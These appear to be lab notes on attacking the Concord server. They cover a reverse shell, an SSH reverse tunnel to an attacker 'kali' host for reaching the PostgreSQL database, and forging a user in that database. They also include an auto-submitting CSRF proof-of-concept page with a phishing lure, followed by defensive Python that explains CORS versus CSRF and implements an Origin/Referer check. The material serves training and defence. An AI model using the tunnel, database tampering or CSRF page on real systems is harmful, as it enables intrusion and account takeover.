Using the shell, add a new user to Concord and authenticate as the new user.
- Requires interaction with the PostgreSQL server
- The server runs in a different Docker instance, which has to be reached through SSH tunnelling
- Read the Concord docs from the start and understand where you are once the reverse shell pops up;
- Think about how web applications usually store their DB access settings;
- SSH is not only a remote access tool; use its "advanced" functionality;
- Now you can connect to the DB and examine it;
- Understand all the data formats needed for login, generate your own, write them to the DB and you'll have access!
Basic port check to see whether the database port is reachable
import socket

# connect_ex() returns 0 on success instead of raising, so it doubles as a port probe
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex(('concord-db', 5432))
if result == 0:
    print("Port is open")
else:
    print("Port is not open")
sock.close()
ssh -R 1111:concord-db:5432 kali@192.168.119.122
psql -h localhost -p 1111 -U postgres
- Probably create a new user using the existing API keys, but the Authorization header doesn't appear to work
- API authentication key needs to be decrypted from the API keys (can we just encrypt our own API key?)
So far we have been using a version of Concord vulnerable to permissive CORS. As mentioned, the permissive CORS headers are not necessary for exploiting the CSRF vulnerability. SSH into the Concord server and run the following commands to stop the old version of Concord and start the newer version.
student@concord:~$ sudo docker-compose -f concord-1.43.0/docker-compose.yml down
student@concord:~$ sudo docker-compose -f concord-1.83.0/docker-compose.yml up -d
Using this newer version of Concord, change the payload and exploit the CSRF vulnerability.
- Shouldn’t be too hard, just need to create a proof of concept and induce the user to click it through phishing
<html>
<body onload="document.forms[0].submit()">
<form action="http://concord:8001/api/service/console/whoami" method="GET">
<input type="hidden" name="acct" value="MARIA"/>
<input type="hidden" name="amount" value="100000"/>
<input type="submit" value="View my pictures"/>
</form>
</body>
</html>
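Added here as an illustration, not code from the original notes or from Concord: it models why the auto-submitted form above reaches the server whether or not CORS is permissive, and shows the server-side Origin/Referer check that would reject it. The trusted origin and request headers are constructed sample values.

```python
from urllib.parse import urlsplit

# Browsers send these cross-origin WITHOUT a CORS preflight (Fetch spec
# "simple request" rules, reduced here to method and Content-Type). A plain
# HTML <form> always falls in this class, so the target server receives and
# processes it whatever its CORS policy says; CORS only gates whether the
# submitting page may READ the response.
SIMPLE_METHODS = {"GET", "HEAD", "POST"}
SIMPLE_CONTENT_TYPES = {"application/x-www-form-urlencoded",
                        "multipart/form-data", "text/plain"}


def needs_preflight(method: str, content_type: str = "") -> bool:
    """True if a browser would send an OPTIONS preflight before this request."""
    if method.upper() not in SIMPLE_METHODS:
        return True
    media = content_type.split(";")[0].strip().lower()
    return bool(media) and media not in SIMPLE_CONTENT_TYPES


def server_receives(method: str, content_type: str, cors_allows_origin: bool) -> bool:
    """Model of browser behaviour: a simple request always reaches the server;
    a preflighted one is sent only if the CORS policy permits the origin."""
    return not needs_preflight(method, content_type) or cors_allows_origin


def origin_of(url: str) -> str:
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}".lower()


def csrf_origin_check(headers: dict, allowed_origins: set) -> bool:
    """Server-side mitigation: accept a state-changing request only when its
    Origin header (or, if absent, the Referer's origin) is trusted.
    Fails closed when neither header is present."""
    h = {k.lower(): v for k, v in headers.items()}
    if "origin" in h:
        source = h["origin"].lower()
    elif "referer" in h:
        source = origin_of(h["referer"])
    else:
        return False
    return source in {o.lower() for o in allowed_origins}


# Constructed sample values: the GET form above, auto-submitted from a page
# on a hypothetical third-party site, versus a same-origin request.
TRUSTED = {"http://concord:8001"}
FORM_SUBMIT = {"Referer": "http://phishing.example/pictures.html"}
SAME_ORIGIN = {"Origin": "http://concord:8001"}
```

With a permissive or a strict CORS policy alike, `server_receives("GET", "", False)` is true for the form, while `csrf_origin_check(FORM_SUBMIT, TRUSTED)` rejects it and `csrf_origin_check(SAME_ORIGIN, TRUSTED)` accepts the legitimate request.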
